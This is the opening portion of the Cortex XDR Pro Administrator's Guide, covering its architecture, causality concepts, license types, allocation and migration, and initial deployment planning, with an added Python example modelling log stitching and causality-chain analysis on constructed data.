Cortex XDR™ Pro Administrator’s Guide

paloaltonetworks.com/documentation
Contact Information
Corporate Headquarters:
Palo Alto Networks
3000 Tannery Way
Santa Clara, CA 95054
www.paloaltonetworks.com/company/contact-support

About the Documentation


• For the most recent version of this guide or for access to related documentation, visit the Technical
  Documentation portal www.paloaltonetworks.com/documentation.
• To search for a specific topic, go to our search page
  www.paloaltonetworks.com/documentation/document-search.html.
• Have feedback or questions for us? Leave a comment on any page in the portal, or write to us at
  [email protected].

Copyright
Palo Alto Networks, Inc.
www.paloaltonetworks.com

© 2018-2020 Palo Alto Networks, Inc. Palo Alto Networks is a registered trademark of Palo
Alto Networks. A list of our trademarks can be found at www.paloaltonetworks.com/company/
trademarks.html. All other marks mentioned herein may be trademarks of their respective companies.

Last Revised
November 2, 2020

2 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE |


Table of Contents
Cortex XDR™ Overview....................................................................................9
Cortex XDR Architecture........................................................................................................................11
Cortex XDR Concepts..............................................................................................................................13
XDR.................................................................................................................................................. 13
Sensors............................................................................................................................................ 13
Log Stitching.................................................................................................................................. 13
Causality Analysis Engine...........................................................................................................14
Causality Chain............................................................................................................................. 14
Causality Group Owner (CGO)................................................................................................. 14
Cortex XDR Licenses............................................................................................................................... 15
Features by Cortex XDR License Type...................................................................................15
Cortex XDR License Allocation.................................................................................................17
Cortex XDR License Expiration................................................................................................ 18
Cortex XDR License Monitoring.............................................................................................. 18
Migrate Your Cortex XDR License.......................................................................................... 20

Get Started with Cortex XDR Pro................................................................25


Set up Cortex XDR Pro Overview........................................................................................................27
Plan Your Cortex XDR Deployment.................................................................................................... 29
Manage Roles.............................................................................................................................................30
Predefined User Roles for Cortex XDR..................................................................................32
Activate your Network Devices............................................................................................................41
Activate Cortex XDR................................................................................................................................42
Set Up Directory Sync.............................................................................................................................45
Pairing Directory Sync................................................................................................................ 45
Allocate Log Storage for Cortex XDR................................................................................................. 47
Set up Endpoint Protection....................................................................................................................50
Plan Your Agent Deployment................................................................................................... 51
Enable Access to Cortex XDR.................................................................................................. 52
Proxy Communication................................................................................................................. 57
Set up Network Analysis.........................................................................................................................58
Configure Cortex XDR.............................................................................................................................59
Integrate External Threat Intelligence Services.................................................................... 60
Set up Your Cortex XDR Environment...................................................................................61
Set up Outbound Integration.................................................................................................................63
Use the Cortex XDR Interface.............................................................................................................. 64
Manage Tables.............................................................................................................................. 65

Endpoint Security..............................................................................................71
Endpoint Security Concepts...................................................................................................................73
About Cortex XDR Endpoint Protection................................................................................ 73
File Analysis and Protection Flow............................................................................................76
Endpoint Protection Capabilities.............................................................................................. 79
Endpoint Protection Modules................................................................................................... 82
Manage Cortex XDR Agents..................................................................................................................90
Create an Agent Installation Package..................................................................................... 90
Set an Application Proxy for Cortex XDR Agents............................................................... 92
Move Cortex XDR Agents Between Managing XDR Servers............................................93

TABLE OF CONTENTS iii


Upgrade Cortex XDR Agents.................................................................................................... 94
Delete Cortex XDR Agents........................................................................................................96
Uninstall the Cortex XDR Agent.............................................................................................. 96
Set an Alias for an Endpoint..................................................................................................... 97
Define Endpoint Groups......................................................................................................................... 98
About Content Updates........................................................................................................................100
Endpoint Security Profiles....................................................................................................................101
Add a New Exploit Security Profile...................................................................................... 102
Add a New Malware Security Profile................................................................................... 106
Add a New Restrictions Security Profile..............................................................................114
Manage Security Profiles......................................................................................................... 115
Customizable Agent Settings...............................................................................................................117
Add a New Agent Settings Profile........................................................................................ 120
Configure Global Agent Settings........................................................................................... 125
Endpoint Data Collected by Cortex XDR............................................................................ 126
Apply Security Profiles to Endpoints.................................................................................................134
Exceptions Security Profiles................................................................................................................ 136
Add a New Exceptions Security Profile............................................................................... 137
Add a Global Endpoint Policy Exception............................................................................. 138
Hardened Endpoint Security............................................................................................................... 146
Device Control............................................................................................................................147
Host Firewall............................................................................................................................... 153
Disk Encryption.......................................................................................................................... 158
Host Inventory............................................................................................................................163
Vulnerability Assessment......................................................................................................... 168

Investigation and Response......................................................................... 173


Cortex XDR Indicators.......................................................................................................................... 175
Working with BIOCs................................................................................................................. 175
Working with IOCs....................................................................................................................182
Manage Existing Indicators..................................................................................................... 186
Search Queries........................................................................................................................................ 189
Cortex XDR Query Builder......................................................................................................189
Cortex XDR Query Center...................................................................................................... 218
Quick Launcher...........................................................................................................................222
Cortex XDR Scheduled Queries.............................................................................................223
Research a Known Threat....................................................................................................... 225
Investigate Incidents.............................................................................................................................. 226
External Integrations................................................................................................................. 229
Manage Incident Starring.........................................................................................................231
Create an Incident Scoring Rule............................................................................................ 232
Investigate Artifacts and Assets......................................................................................................... 235
Investigate an IP Address........................................................................................................ 235
Investigate an Asset.................................................................................................................. 238
Investigate a File and Process Hash..................................................................................... 239
Investigate Alerts.................................................................................................................................... 243
Cortex XDR Alerts.....................................................................................................................243
Triage Alerts................................................................................................................................ 251
Manage Alerts.............................................................................................................................251
Alert Exclusions.......................................................................................................................... 255
Causality View............................................................................................................................ 257
Network Causality View.......................................................................................................... 260
Timeline View............................................................................................................................. 263
Analytics Alert View..................................................................................................................264

Investigate Endpoints............................................................................................................................ 267
Action Center..............................................................................................................................267
View Details About an Endpoint........................................................................................... 271
Retrieve Files from an Endpoint............................................................................................ 276
Retrieve Support Logs from an Endpoint............................................................................ 278
Scan an Endpoint for Malware...............................................................................................278
Investigate Files...................................................................................................................................... 281
Manage File Execution............................................................................................................. 281
Manage Quarantined Files...................................................................................................... 282
Review WildFire Analysis Details.......................................................................................... 283
Import File Hash Exceptions...................................................................................................286
Response Actions................................................................................................................................... 287
Initiate a Live Terminal Session..............................................................................................288
Isolate an Endpoint....................................................................................................................293
Remediate Changes from Malicious Activity...................................................................... 294
Run Scripts on an Endpoint.................................................................................................... 296
Search and Destroy Malicious Files...................................................................................... 308
Manage External Dynamic Lists.............................................................................................311

Broker VM........................................................................................................315
Broker VM Overview............................................................................................................................ 317
Set up Broker VM.................................................................................................................................. 318
Configure the Broker VM........................................................................................................318
Activate the Agent Proxy........................................................................................................ 329
Activate the Syslog Collector................................................................................................. 329
Activate the Network Mapper............................................................................................... 331
Activate Pathfinder....................................................................................................................333
Activate the Windows Event Collector................................................................................338
Manage Your Broker VMs................................................................................................................... 347
View Broker VM Details.......................................................................................................... 347
Edit Your Broker VM Configuration..................................................................................... 349
Collect Broker VM Logs...........................................................................................................350
Reboot a Broker VM.................................................................................................................351
Upgrade a Broker VM.............................................................................................................. 351
Open Remote Terminal............................................................................................................ 351
Remove a Broker VM............................................................................................................... 353
Broker VM Notifications.......................................................................................................................354

External Data Ingestion................................................................................ 355


External Data Ingestion Vendor Support......................................................................................... 357
Visibility of Logs and Alerts from External Sources in Cortex XDR........................................... 359
Ingest Network Connection Logs.......................................................................................................363
Ingest Logs from Check Point Firewalls...............................................................................363
Ingest Logs from Cisco ASA Firewalls..................................................................................364
Ingest Logs from Fortinet Fortigate Firewalls.................................................................... 364
Ingest Logs from Corelight Zeek........................................................................................... 365
Ingest Authentication Logs and Data................................................................................................367
Ingest Logs from Microsoft Azure AD................................................................................. 367
Ingest Authentication Logs and Data from Okta...............................................................368
Ingest Authentication Logs from PingFederate..................................................................369
Ingest Authentication Logs and Data from PingOne........................................................ 370
Ingest Operation and System Logs from Cloud Providers........................................................... 371
Ingest Logs from AWS CloudTrail and Amazon CloudWatch.........................................371

Ingest Logs and Data from a GCP Pub/Sub....................................................................... 373
Ingest Logs from Google Kubernetes Engine..................................................................... 377
Additional Log Ingestion Methods for Cortex XDR.......................................................................381
Ingest Logs from a Syslog Receiver...................................................................................... 381
Ingest Logs from Elasticsearch Filebeat............................................................................... 381
Ingest External Alerts............................................................................................................................ 384

Analytics............................................................................................................387
Analytics Concepts.................................................................................................................................389
Analytics Engine......................................................................................................................... 389
Analytics Sensors....................................................................................................................... 390
Coverage of the MITRE Attack Tactics................................................................................391
Analytics Detection Time Intervals....................................................................................... 393
Analytics Alerts and Analytics BIOCs................................................................................... 395

Asset Management........................................................................................ 397


About Asset Management....................................................................................................................399
Configure Your Network Parameters................................................................................................400
Define IP Address Ranges....................................................................................................... 400
Define Domain Names............................................................................................................. 401
Manage Your Network Assets............................................................................................................ 402

Monitoring........................................................................................................405
Cortex XDR Dashboard........................................................................................................................ 407
Dashboard Widgets...................................................................................................................407
Manage Your Widget Library................................................................................................. 413
Predefined Dashboards............................................................................................................ 415
Build a Custom Dashboard......................................................................................................418
Manage Dashboards..................................................................................................................420
Run or Schedule Reports......................................................................................................... 420
Monitor Cortex XDR Incidents........................................................................................................... 422
Monitor Administrative Activity......................................................................................................... 424
Monitor Agent Activity......................................................................................................................... 426
Monitor Agent Operational Status.....................................................................................................429

Log Forwarding............................................................................................... 431


Log Forwarding Data Types................................................................................................................ 433
Integrate Slack for Outbound Notifications.................................................................................... 434
Integrate a Syslog Receiver................................................................................................................. 436
Configure Notification Forwarding.................................................................................................... 438
Cortex XDR Log Notification Formats.............................................................................................. 440
Alert Notification Format.........................................................................................................440
Agent Audit Log Notification Format................................................................................... 449
Management Audit Log Notification Format......................................................................450
Cortex XDR Log Format for IOC and BIOC Alerts............................................................452
Cortex XDR Analytics Log Format.........................................................................................460
Cortex XDR Log Formats.........................................................................................................465

Managed Security...........................................................................................493
About Managed Security...................................................................................................................... 495

Cortex XDR Managed Security Access Requirements.................................................................. 496
Set up Managed Threat Hunting........................................................................................................497
Pair a Parent Tenant with Child Tenant........................................................................................... 499
Pairing a Parent and Child Tenant.........................................................................................499
Unpairing a Parent and Child Tenant................................................................................... 500
Manage a Child Tenant.........................................................................................................................501
Track your Tenant Management............................................................................................501
Investigate Child Tenant Data................................................................................................502
Create and Allocate Configurations...................................................................................... 503
Create a Security Managed Action....................................................................................... 504

Cortex XDR™ Overview
The Cortex XDR™ app offers you complete visibility over network traffic, user behavior, and
endpoint activity. It simplifies threat investigation by correlating logs from your sensors to
reveal threat causalities and timelines. This enables you to easily identify the root cause of
every alert. The app also allows you to perform immediate response actions. Finally, to stop
future attacks, you can pro-actively define IOCs and BIOCs to detect and respond to malicious
activity.

• Cortex XDR Architecture
• Cortex XDR Concepts
• Cortex XDR Licenses

Cortex XDR Architecture

Cortex XDR consumes data from the Cortex Data Lake and can correlate and stitch together logs across
your different log sensors to derive event causality and timelines. A Cortex XDR deployment which uses the
full set of sensors can include the following components:
• Cortex XDR—The Cortex XDR app provides complete visibility into all your data in the Cortex Data Lake.
The app provides a single interface from which you can investigate and triage alerts, take remediation
actions, and define policies to detect the malicious activity in the future.
• Cortex Data Lake—A cloud-based logging infrastructure that allows you to centralize the collection and
storage of logs from your log data sources.
• Cortex XDR Pro per TB:
• Analytics engine—The Cortex XDR analytics engine is a security service that utilizes network data
to automatically detect and report on post-intrusion threats. The analytics engine does this by
identifying good (normal) behavior on your network, so that it can notice bad (anomalous) behavior.
• Palo Alto Networks next-generation firewalls—On-premise or virtual firewalls that enforce network
security policies in your campus, branch offices, and cloud data centers.
• Palo Alto Networks Prisma Access and GlobalProtect—If you extend your firewall security policy
to mobile users and remote networks using Prisma Access or GlobalProtect, you can also forward
related traffic logs to Cortex Data Lake. The analytics engine can then analyze those logs and raise
alerts on anomalous behavior.
• External firewalls and alerts—Cortex XDR can ingest traffic logs from external firewall vendors—such
as Check Point—and use the analytics engine to analyze those logs and raise alerts on anomalous
behavior. For additional context in your incidents, you can also send alerts from external alert
sources.
• Cortex XDR Pro per Endpoint:
• Analytics engine—The Cortex XDR analytics engine can also consume endpoint data to automatically detect
and report on post-intrusion threats. The analytics engine can use endpoint data to raise alerts for
abnormal network behavior (for example, port scan activity).
• Cortex XDR agents—Protect your endpoints from known and unknown malware and malicious
behavior and techniques. Cortex XDR agents perform their own analysis locally on the endpoint and
also consume WildFire threat intelligence. The Cortex XDR agent reports all endpoint activity to the
Cortex Data Lake for analysis by Cortex XDR apps.

• External alert sources—To add additional context to your incidents, you can send Cortex XDR alerts
from external sources using the Cortex XDR API.

Cortex XDR Concepts
• XDR
• Sensors
• Log Stitching
• Causality Analysis Engine
• Causality Chain
• Causality Group Owner (CGO)
• Analytics Concepts

XDR
With Endpoint Detection and Response (EDR), enterprises rely on endpoint data as a means to trigger
cybersecurity incidents. As cybercriminals and their tactics have become more sophisticated, the time
to identify and contain breaches has only increased. XDR goes beyond the traditional EDR approach of
using only endpoint data to identify and respond to threats by applying machine learning across all your
enterprise, network, cloud, and endpoint data. This approach enables you to quickly find and stop targeted
attacks and insider abuse and remediate compromised endpoints.

Sensors
Cortex XDR™ uses your existing Palo Alto Networks products as sensors to collect logs and telemetry data.
The sensors that are available to you depend on your Cortex XDR license type.
With a Cortex XDR Pro per TB license, a sensor can be any of the following:
• Virtual (VM-Series) or physical firewalls—Identifies known threats in your network and cloud data center
environments
• Prisma Access or GlobalProtect—Identifies known threats in your mobile user and remote network
traffic
• External vendors—You can forward logs from supported vendors and additional vendors that adhere to
required formats.
With a Cortex XDR Pro per Endpoint license, a sensor can be any of the following:
• Cortex XDR agents—Identifies threats on your Windows, Mac, Linux, and Android endpoints and halts
any malicious behavior or files
While more sensors increase the amount of data Cortex XDR can analyze, you need to deploy only one
type of sensor to begin detecting and stopping threats with Cortex XDR.

Log Stitching
To provide a complete and comprehensive picture of the events and activity surrounding an event, Cortex
XDR™ correlates firewall network logs, endpoint raw data, and cloud data across your detection
sensors. Correlating logs from different sources is referred to as log stitching; it helps you
identify the source and destination of security processes and connections made over the network.
Log stitching allows you to:
• Run investigation queries based on stitched network and endpoint logs
• Create granular BIOC rules over logs from Palo Alto Networks Next-Generation Firewalls and raw
endpoint data
• Investigate correlated network and endpoint events in the Network Causality View

Log stitching streamlines detection and reduces response time by eliminating the need for manual analysis
across different data sensors. Stitching data across the firewalls and endpoints gives you data
from different sensors in a unified view, each sensor adding another layer of visibility. For example, when
a connection is seen by both the firewall and the endpoint, the endpoint can provide information on the
processes involved and on the chain of execution, while the firewall can provide information on the amount
of data transferred over the connection and the App-IDs involved.

Causality Analysis Engine
The Causality Analysis Engine correlates activity from all detection sensors to establish causality chains
that identify the root cause of every alert. The Causality Analysis Engine also builds a complete forensic
timeline of events that helps you determine the scope and damage of an attack and respond immediately.
The Causality Analysis Engine determines the most relevant artifacts in each alert and aggregates
all alerts related to an event into an incident.

Causality Chain
When a malicious file, behavior, or technique is detected, Cortex XDR™ correlates available data across
your detection sensors to display the sequence of activity that led to the alert. This sequence of events is
called the causality chain. The causality chain is built from processes, events, insights, and alerts associated
with the activity. During alert investigation you should review the entire causality chain to fully understand
why the alert occurred.

Causality Group Owner (CGO)
The Causality Group Owner (CGO) is the process in the causality chain that the Causality Analysis Engine
identified as being responsible for or causing the activities that led to the alert.
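The following Python model is an added example, not code from this guide or from Palo Alto Networks, that ties together the Log Stitching and Causality Group Owner sections above on constructed sample data: a firewall traffic record is stitched to the endpoint connection event for the same flow, and the process tree is then walked from the connecting process up to the CGO. The 4-tuple match, the 60-second clock tolerance, and the "launcher boundary" rule that ends the chain are assumptions of this example; the page does not describe the engine's actual matching or CGO-selection logic.

```python
# Added example (not Palo Alto Networks code): a toy model of log stitching and
# of walking a causality chain to its owner (CGO). All records are constructed.
# Assumptions: flows are matched on the 4-tuple within a clock tolerance, and the
# chain stops below a generic launcher such as explorer.exe.
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional


@dataclass
class FirewallLog:
    """What the firewall sensor contributes: the flow, its App-ID and volume."""
    ts: datetime
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    app_id: str
    bytes_total: int


@dataclass
class EndpointConn:
    """What the agent contributes: which process opened the same flow."""
    ts: datetime
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    pid: int


@dataclass
class Process:
    pid: int
    ppid: Optional[int]
    name: str


# Processes this example treats as generic launchers; the chain stops below them.
# (Assumption: the real engine's CGO selection is not described on this page.)
LAUNCHER_BOUNDARY = {"explorer.exe", "services.exe", "wininit.exe"}


def stitch(fw: FirewallLog, conns: List[EndpointConn],
           tolerance: timedelta = timedelta(seconds=60)) -> Optional[EndpointConn]:
    """Join a firewall flow to the endpoint event for the same 4-tuple.

    Timestamps only have to agree within `tolerance`, because the firewall and
    the endpoint do not share a clock."""
    for c in conns:
        same_flow = ((c.src_ip, c.src_port, c.dst_ip, c.dst_port) ==
                     (fw.src_ip, fw.src_port, fw.dst_ip, fw.dst_port))
        if same_flow and abs(c.ts - fw.ts) <= tolerance:
            return c
    return None


def causality_chain(pid: int, procs: Dict[int, Process]) -> List[Process]:
    """Walk parent links upward from the process that made the connection.

    Stops at a missing parent, a launcher boundary, or a cycle; the last
    element is taken as the Causality Group Owner (CGO)."""
    chain: List[Process] = []
    seen = set()
    cur = procs.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur)
        parent = procs.get(cur.ppid) if cur.ppid is not None else None
        if parent is None or parent.name.lower() in LAUNCHER_BOUNDARY:
            break
        cur = parent
    return chain


def network_causality(fw: FirewallLog, conns: List[EndpointConn],
                      procs: Dict[int, Process]) -> Optional[dict]:
    """Stitched view: firewall facts plus the endpoint's chain of execution."""
    conn = stitch(fw, conns)
    if conn is None:
        return None  # flow seen at the firewall only (for example, no agent)
    chain = causality_chain(conn.pid, procs)
    return {"app_id": fw.app_id, "bytes_total": fw.bytes_total,
            "chain": [p.name for p in chain],
            "cgo": chain[-1].name if chain else None}


# --- constructed sample data ------------------------------------------------
T = datetime(2020, 11, 2, 12, 0, 0)
PROCESSES = {p.pid: p for p in [
    Process(100, None, "explorer.exe"),
    Process(200, 100, "WINWORD.EXE"),
    Process(300, 200, "cmd.exe"),
    Process(400, 300, "powershell.exe"),
]}
ENDPOINT_CONNS = [
    EndpointConn(T + timedelta(seconds=2), "10.1.1.25", 51234, "203.0.113.10", 443, 400),
]
FW_LOG = FirewallLog(T + timedelta(seconds=5), "10.1.1.25", 51234,
                     "203.0.113.10", 443, "ssl", 120_000)
# Same destination from a host that reported no endpoint event: nothing stitches.
UNMATCHED_FW_LOG = FirewallLog(T, "10.1.1.99", 40000, "203.0.113.10", 443, "ssl", 512)

if __name__ == "__main__":
    print(network_causality(FW_LOG, ENDPOINT_CONNS, PROCESSES))
    print(network_causality(UNMATCHED_FW_LOG, ENDPOINT_CONNS, PROCESSES))
```

In the stitched result the firewall supplies the App-ID and byte count, the endpoint supplies the chain powershell.exe, cmd.exe, WINWORD.EXE, and the document's WINWORD.EXE process is reported as the CGO; the second record shows the other side of stitching, a flow the firewall saw but no agent reported, which is exactly the gap an agentless host leaves in the Network Causality View.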
Cortex XDR Licenses
• Features by Cortex XDR License Type
• Cortex XDR License Allocation
• Cortex XDR License Expiration
• Cortex XDR License Monitoring
• Migrate Your Cortex XDR License

Features by Cortex XDR License Type


The following table describes the capabilities associated with each Cortex XDR license type. You can
use either Cortex XDR Prevent or a Cortex XDR Pro license. There are two types of Pro licenses, Cortex
XDR Pro per Endpoint and Cortex XDR Pro per TB, that you can use independently or together for more
complete coverage. If you do not know which license type you have, see Cortex XDR License Monitoring.

License types compared: Cortex XDR Prevent, Cortex XDR Pro per Endpoint, Cortex XDR Pro per TB.

Log storage
• Cortex XDR Prevent: minimum of 200 endpoints; 30 day log retention
• Cortex XDR Pro per Endpoint: minimum of 200 endpoints; 30 day log retention
• Cortex XDR Pro per TB: minimum 5TB log storage

Cortex XDR Add-on Licenses (add-on licenses are required on top of a Cortex XDR license)
• Host Insights, including Host Inventory, Vulnerability Assessment, and File Search and Destroy: not included with Cortex XDR Prevent (—) or Cortex XDR Pro per TB (—). Without the add-on license, Host Insights is available with Cortex XDR Pro per Endpoint for a 1-month trial period.

Endpoint Prevention Features
• Endpoint management —
• Device control —
• Host firewall —
• Disk encryption —

Response Actions
• Live Terminal —
• Endpoint isolation —
• External dynamic list (EDL) —
• Script execution — —
• Remediation analysis — —
• Incident Scoring Rules —
• Featured Alert Fields —
• Widget Library —

Analysis
• Analytics —

Alert and Log Ingestion
• Cortex XDR agent alerts —
• Enhanced data collection for EDR and other Pro features — —
• Other alerts (from Palo Alto Networks and third-party sources) — (API)
• Other logs (from Palo Alto Networks and third-party sources) — —

Integrations
• Threat intelligence (AutoFocus, VirusTotal)
• Outbound integration and notification forwarding (Slack, Syslog) + agent audit logs + agent audit logs

Broker VM
• Agent Proxy
• Syslog Collector
• Network Mapper
• Pathfinder
• Windows Event Collector

MSSP
• MSSP (requires additional MSSP license)
• Managed Threat Hunting (requires an additional Managed Threat Hunting License) — — + a minimum of 500 endpoints

Cortex XDR License Allocation
• Enforcement of Cortex XDR Pro Agent Licenses
• License Revocation

Enforcement of Cortex XDR Pro Agent Licenses
For the Cortex XDR Pro per Endpoint license, Cortex XDR limits the number of Pro agents and associated
Pro capabilities to the number of agents allocated by the license. Pro agent features include:
• Enhanced Data Collection on the endpoint
• Remediation analysis
• Host Insights including Vulnerability Assessment, Host Inventory, and File Search and Destroy
You can further refine the endpoints on which you enable Pro features in your agent settings profiles.
After all available Pro licenses are in use, Cortex XDR falls back to a Cortex XDR Prevent policy that protects
the endpoint but does not include Pro-specific capabilities. When you exceed the permitted number of Pro
agents, Cortex XDR displays a notification in the notification area. Cortex XDR permits a small overage beyond
the permitted number but begins enforcing the limit after 14 days. If additional Pro agents are
required, increase your Cortex XDR Pro per Endpoint license capacity.
To view the Pro license status for specific endpoints, see View Details About an Endpoint.

License Revocation
With Cortex XDR Prevent and Cortex XDR Pro per Endpoint licenses, Cortex XDR manages licensing for all
endpoints in your organization. Each time you install a new Cortex XDR agent on an endpoint, the Cortex
XDR agent registers with Cortex XDR to obtain a license. In the case of non-persistent VDI, the Cortex XDR
agent registers with Cortex XDR as soon as the user logs in to the endpoint.
Cortex XDR issues licenses until you exhaust the number of license seats available. Cortex XDR also
enforces a license cleanup policy to automatically return unused licenses to the pool of available licenses.
The time at which a license returns to the license pool depends on the type of endpoint:

Standard and mobile devices
• License Return: After 30 days
• Agent Removal from Cortex XDR console: After 180 days
• Agent Removal from Cortex XDR Database: After 180 days

(Non-Persistent) VDI and Temporary Session
• License Return: Immediately after log-off for VDI, otherwise after 90 minutes
• Agent Removal from Cortex XDR console: After 6 hours
• Agent Removal from Cortex XDR Database: After 7 days

After a license is revoked, if the agent connects to Cortex XDR, reconnection will succeed as long as the
agent has not been deleted.
After an agent is deleted, the agent ID and all the relevant agent data are deleted from the Cortex XDR
database. If the agent connects to Cortex XDR after it was deleted from the database, the agent is assigned
a new ID and a fresh start.

It can take up to an hour for Cortex XDR to display revived endpoints.

Cortex XDR License Expiration


Cortex XDR licenses are valid for the period of time associated with the license purchase. After your Cortex
XDR license expires, Cortex XDR allows access to your tenant for an additional grace period of 48 hours.
After the 48-hour grace period, Cortex XDR disables access to the Cortex XDR app until you renew the
license.
For the first 30 days of your expired license, Cortex XDR continues to protect your endpoints and/or
network and retains data in the Cortex Data Lake according to your Cortex Data Lake data retention policy
and licensing. After 30 days, the tenant is decommissioned and agent prevention capabilities cease.

Cortex XDR License Monitoring


From the > Cortex XDR License dialog, you can view the license type associated with your Cortex XDR
instance.

For each license, Cortex XDR displays a tile that has the expiration date of your license and additional
details specific to your license type:

• Cortex XDR Prevent: Displays the total number of concurrent agents permitted by your license. You can
also view a graph of the current license allocation (total and percentage).
• Cortex XDR Pro per Endpoint: Displays the total number of installed agents in addition to the number and
percentage of agents with Pro features enabled. Below the license tile, you can also view the storage
retention policy, total amount of storage allocated for enhanced data collection, and the actual data usage.
• Cortex XDR Pro per TB: Displays the amount of total storage included with your license and the amount of
storage used.
• Combination of Cortex XDR Pro per Endpoint and Cortex XDR Pro per TB: Cortex XDR Pro per Endpoint
displays the total number of installed agents, while Cortex XDR Pro per TB displays how many agents are
enabled with endpoint data collection, allowing them to collect and send data to the server.

Add-Ons
• Host Insights: Displays the expiration of the license.

To keep you informed of updates made to your license and avoid service disruptions, Cortex XDR displays
license notifications when you log in. The notification identifies any changes made to your license and
describes any required actions.
Cortex XDR also indicates when you have exceeded your Cortex XDR Pro per Endpoint license capacity.
To view the Pro license status for specific endpoints, see View Details About an Endpoint. For more
information, see Enforcement of Cortex XDR Pro Agent Licenses.

Migrate Your Cortex XDR License
As part of the migration from Cortex XDR 1.0 to Cortex XDR 2.0, a new Cortex XDR licensing structure will go
into effect. The new licensing structure gives you a clearer view of, and more control over, how your network data and
endpoints are used across your organization.
The Cortex XDR 1.0 license was based on the number of terabytes (TB) used for either:
• 1TB = 200 Pro per Endpoints (with EDR Collection)
or
• 1TB = 1TB of network traffic analysis/third party data + 200 Prevent Endpoints (without EDR collection)
The Cortex XDR 2.0 license structure is based on three Cortex XDR licenses that you can purchase
individually or in combination. The endpoint licenses provide the number of permitted agents, either
Prevent or Pro. The TB license specifies the number of TB used for network traffic analysis and collecting
third-party data:
• Cortex XDR Prevent license—Number of Prevent Endpoints (without EDR collection)
• Cortex XDR Pro per Endpoint license—Number of Pro Endpoints (with EDR collection)
• Cortex XDR Pro per TB license—Amount of network data used for network traffic analysis and third-
party data.

License Conversion Method and Example
A Cortex XDR 1.0 license is converted to a Cortex XDR 2.0 license as follows:
• Endpoints: For each Cortex XDR 1.0 license, 1 TB = 200 Pro per Endpoints (with EDR collection).
The number of endpoints is converted based on the quota allocated in
Hub > Cortex Data Lake > Cortex XDR > Endpoint XDR Data, previously Traps > Endpoint Data.
• Network Data: For each Cortex XDR 1.0 license, 1 TB = 1 TB of network data.

Since the Cortex XDR 2.0 Pro per TB license no longer includes Prevent endpoints, the license does not
reflect them; however, you can keep using them until your renewal.

After migration to Cortex XDR 2.0, when you navigate to > Cortex XDR License, the license displays the
converted amount of network data or its equivalent number of endpoints allocated to your license. The
following example compares a Cortex XDR 1.0 license with its converted Cortex XDR 2.0 license.

Cortex XDR 1.0 License
• Cortex XDR 1.0 PAN-MGFR-XDR-1TB license - 100TB
• Hub > Cortex Data Lake > Traps > Endpoint Data - 10TB Endpoint Data

Post Migration Cortex XDR 2.0 License
• Up to 20,000 Pro per Endpoints
• Up to 100TB for network traffic analysis and third-party data

Convert Your Cortex XDR License
When your Cortex XDR app is migrated to Cortex XDR 2.0, we recommend you convert your Cortex XDR
license to align with the new structure. To apply the new license structure, determine how the amount of
network data and number of endpoints are distributed across your organization.

After you convert your legacy license to Cortex XDR 2.0 license structure, your new network
and endpoint allocation are applied immediately. You can edit the allocation at any time,
however, after you convert to the new license structure you cannot revert to your legacy
license.

STEP 1 | In the Cortex XDR app, select > Cortex XDR License.
• (1) Network quota in TB and qualifying number of Pro per Endpoints
• (2,3) Number of agents installed and enabled to collect EDR data in your organization based on the
quota allocated in Hub > Cortex Data Lake > Cortex XDR > Endpoint XDR Data.
• (4) Current number of days Cortex XDR retains your data.

STEP 2 | Convert your Cortex XDR 1.0 license to Cortex XDR 2.0 license.
1. Select Convert License.

2. Use the Network Allocation slide bar to allocate your license between network and endpoints (1
network TB = 200 endpoints).

If you allocate all of your license to network data then you disable endpoint capabilities
(and vice versa).
3. Apply your new license allocations.

STEP 3 | In your new Cortex XDR 2.0 license, review or Edit your license allocation:
• Number of Cortex XDR agents
• Amount of network TB
• Number of installed endpoints and endpoints enabled with EDR Data collection according to the
number of agents allocated to your license, rather than the Cortex Data Lake distribution.
• Number of days remaining for Cortex XDR to retain your data.

STEP 4 | Should you require additional TB or agent coverage, contact your Sales representative.

Get Started with Cortex XDR Pro
• Set up Cortex XDR Pro Overview

Set up Cortex XDR Pro Overview
Before you can use Cortex XDR for advanced detection and response, you must activate the Cortex XDR
app and set up related apps and services. You must perform the setup activities as shown in the following
image. Some steps are required only if you have the corresponding license type.

STEP 1 | Plan Your Cortex XDR Deployment.
As part of your planning, ensure that you or the person who is activating Cortex apps has the
appropriate roles.

STEP 2 | (Cortex XDR Pro per TB license only) Activate your Network Devices.

STEP 3 | Activate Cortex XDR and related apps and services.
1. Locate the email that contains your activation information.
2. Activate Cortex XDR.
3. Activate Cortex Data Lake (if not using an existing instance).
4. (Optional) Create a Directory Sync Service instance.
5. Review log storage.

STEP 4 | (Cortex XDR Pro per Endpoint only) Set up Endpoint Protection.
1. Plan your Cortex XDR agent deployment.
2. Create Cortex XDR agent installation packages
3. Define endpoint groups.
4. Deploy the Cortex XDR agent to your endpoints.
5. Configure your endpoint security policy.

STEP 5 | (Cortex XDR Pro per TB license only) Set up Network Analysis.
1. Perform any remaining setup of your network sensors.
2. Configure the internal networks that you want Cortex XDR to monitor.
3. Verify that Cortex XDR is receiving alerts.
4. If you set up a Directory Sync Service instance, enable Cortex XDR to use it.

STEP 6 | Configure Cortex XDR.


1. (Optional) Integrate additional threat intelligence.
2. After 24 hours, enable Cortex XDR Analytics Analysis.
1. Configure Network Coverage.

2. (Recommended) Activate Pathfinder to interrogate endpoints that do not have the Cortex XDR
agent installed.
3. Define alert exclusions.
4. Prioritize incidents based on attributes by creating an incident starring policy.
5. Import or configure rules for known BIOC and IOCs.
6. (Optional) Manage External Dynamic Lists (requires a Cortex XDR Pro per TB license).

STEP 7 | (Optional) Set up Outbound Integration.


• Integrate with Slack
• Integrate with a Syslog Server
• Integrate with Cortex XSOAR

STEP 8 | (Optional) Set up Managed Security

STEP 9 | Use the Cortex XDR Interface.

Plan Your Cortex XDR Deployment
Before you get started with Cortex XDR™, plan your deployment:

Deployment Type: New Cortex XDR tenants
Deployment Considerations:
• Use the Cortex Data Lake Calculator to determine the amount of log storage you need for your Cortex XDR
deployment. Talk to your Partner or Sales Representative to determine whether you must purchase
additional Cortex Data Lake storage.
• Determine the region in which you want to host Cortex XDR and any associated services, such as Cortex
Data Lake and Directory Sync Service:
  • US—All Cortex XDR logs and data remain within the US boundary.
  • UK—All Cortex XDR logs and data remain within the UK boundary.
  • EU—All Cortex XDR logs and data remain within the Europe boundary.
  • SG—All Cortex XDR logs and data remain within the Singapore boundary.
